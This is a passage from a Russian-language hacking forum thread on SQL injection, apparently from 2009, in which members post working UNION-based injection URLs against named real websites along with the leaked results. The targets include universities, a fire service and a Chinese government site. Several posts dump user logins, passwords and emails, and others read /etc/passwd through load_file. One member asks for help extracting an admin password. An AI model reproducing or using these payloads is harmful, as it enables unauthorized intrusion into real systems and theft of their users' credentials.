SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 517 of 798
  1. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.bme.jhu.edu/people/primary.php?id=-393+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27/*

    Database Version: 5.0.45
    Database name: bme
    User name: bmeweb@localhost
     
    #10321 Skofield, 12 Aug 2009
  2. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.french-e-girls.com/girl.php?id=2-3%20union%20select%201,concat_ws(0x3a,iduser,login,password,email,enddate,suspended),3,4,5,6,7,8%20from%20userccbill%20limit%201,1--

    Опять же все пользовательские пароли с мыльниками в открытом виде даже некоторые подходят к мылам


    ____________

    http://www.aramis-london-escorts.co.uk/girl.php?id=2-5%20UNION+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20information_schema.columns%20where%20table_name=0x6573636f727473%20--

    Версия 5

    _______________

    http://www.sweet-e-girls.com/girl.php?id=2-1%20union%20select%201,2,3,concat_ws(0x3a,login,password),5,6,7,8%20from%20user%20--

    Чето меня на порно сайты потянуло 3 подряд.... хех тут кстати тоже все пароли в OPEN
     
    #10322 Assembler, 12 Aug 2009
    Last edited by a moderator: 12 Aug 2009
    2 people like this.
  3. fraIzer

    fraIzer Member

    Joined:
    27 Jul 2009
    Messages:
    11
    Likes Received:
    8
    Reputations:
    0
    Code:
    http://www.kent.fire-uk.org//playmovie.php?contid=-40+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10/*
    [email protected]:5.0.22:KFRSLive
     
    #10323 fraIzer, 12 Aug 2009
  4. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.msop.avtograd.ru/people.php?action=show&id=1-1%20union%20select%201,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20phpbb2_users%20limit%201,1--

    Вот и пасс от форума только в хеш -(( а на форуме бд н а 36 000 человек..
     
    #10324 Assembler, 12 Aug 2009
  5. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    PR 5

    Code:
    http://www.kyfestivals.com/details.php?id=-125'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,29+from+mysql.user/*
    Database Version: 4.1.22
    Database name: kyfestivals
    User name: setel@localhost
     
    #10325 Skofield, 12 Aug 2009
  6. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    PR6
    Code:
    http://www.cckc.gov.cn/cckc/lnw/news_view.php?id=2+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7--
    Database Version: 5.0.75-0ubuntu10
    Database name: cckc2005_lnw
    User name: cress@localhost
     
    #10326 beerhack, 12 Aug 2009
  7. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    5.0.32-Debian_7etch8-log www@localhost truman
     
    #10327 Swift, 13 Aug 2009
  8. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://kryolan.s10.omatix.de/en/index.php?mnu=612&id=35+limit+0+UNION+SELECT+1,CONCAT(version(),database(),user()),3,4--

    database Version: 5.0.32-Debian_7etch8-log
    database name: kryolansql1
    user name: kryolansql1@localhost
     
    #10328 RazyKK, 13 Aug 2009
  9. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://www.gripskateshop.co.uk/index.php?ID=35+limit+0+UNION+SELECT+1,CONCAT(version(),database(),user()),3,4,5,6--

    database Version: 5.0.82-community
    database name: web36-user-2
    user name: web36-user-2@localhost
     
    #10329 RazyKK, 13 Aug 2009
    1 person likes this.
  10. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://pescaderiascorunesas.es/gran_cocina/autor/?id=-13+union+select+1,2,3,4,CONCAT(version(),database(),user()),6,7,8,9--
    [email protected]
     
    #10330 z00MAN, 13 Aug 2009
    1 person likes this.
  11. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    PR 8
    http://exploratorium.edu/webcasts/explotv_player.php?id=-00000759+union+select+version(),2,3/*

    Database Version: 5.0.33
    Database name: ExploMedia
    User name: [email protected]
     
    #10331 Skofield, 13 Aug 2009
    1 person likes this.
  12. lexus5122

    lexus5122 New Member

    Joined:
    16 Mar 2007
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    http://www.eored.ru/faq.php?s=&do=search&q=%00'&match=all&titlesonly=0

    Видно что есть инъекция, но запрос походу не верный ( иначе бы показался админский пасс с солью (
    Помогите пожалуйста сформировать правельный...
     
    #10332 lexus5122, 13 Aug 2009
  13. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://www.terfeliaid.co.uk/index.php?page=4&id=35+limit+0+UNION+SELECT+1,CONCAT(version(),database(),user()),3,4,5,6,7,8--

    database Version: 5.0.22-Debian_0ubuntu6.06.11-log
    database name: terfeliaid_db
    user name: terfeliaid2@localhost
     
    #10333 RazyKK, 13 Aug 2009
  14. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://takproperty.co.uk/search.php?ref_id=&status=-&region=-&location=7+limit+0+UNION+SELECT+CONCAT(version(),database(),user()),2,3,4,5--
    database Version: 5.0.67-percona-highperf-b10-log
    database name: takprop_takeproperty
    user name: takprop_admin@localhost
     
    #10334 RazyKK, 13 Aug 2009
    2 people like this.
  15. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://www.wickesmedia.co.uk/site/pages/newsitem.php?id=35+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(version(),database(),user()),0x71),0x71),4,5,6,7,8,9,10,11--

    database Version: 5.0.17-standard
    database name: wickesdb
    user name: [email protected]
     
    #10335 RazyKK, 13 Aug 2009
  16. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.uiartsfaculty.net/cv/showcv.php?id=-51+union+select+1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,22--

    Database Version: 5.0.81-community-log
    Database name: cactilio_uifacultyofarts
    User name: cactilio_ui@localhost
     
    #10336 Skofield, 13 Aug 2009
    1 person likes this.
  17. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    http://www.dhcottages.co.uk/details.php?id=35+UNION+SELECT+1,2,3,4,CONCAT(version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+LIMIT+1,1--

    Database Version: 4.1.22-community-nt-log
    Database name: dch_admin
    User name: Ravine@DSVR009974
     
    #10337 RazyKK, 13 Aug 2009
    1 person likes this.
  18. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    MSSQL-Inj:
    Code:
    http://www.right-travel.com/travel_tips.php?id=1%27+or+1=@@version+--+
     
    #10338 -JC-, 13 Aug 2009
    Last edited by a moderator: 13 Aug 2009
  19. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    PR3 тиц100
    Code:
    http://www.nerungri[COLOR=Lime].edu.ru[/COLOR]/muuo/web/3/admin/index.php?page=edit&id=-8+union+select+1,2,3,4,concat_ws(0x3a,username,email,password),6,7,8,9,0,11+from+antoria.jos_users/*
    Database Version: 5.0.32-Debian_7etch10-log
    Database name: history
    User name: admin@localhost
     
    #10339 beerhack, 13 Aug 2009
    3 people like this.
  20. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    4.1.22-standardsalsamov_londonsalsasalsamov@localhost
     
    #10340 Swift, 13 Aug 2009
    1 person likes this.
(You must log in or sign up to post here.)
Page 517 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.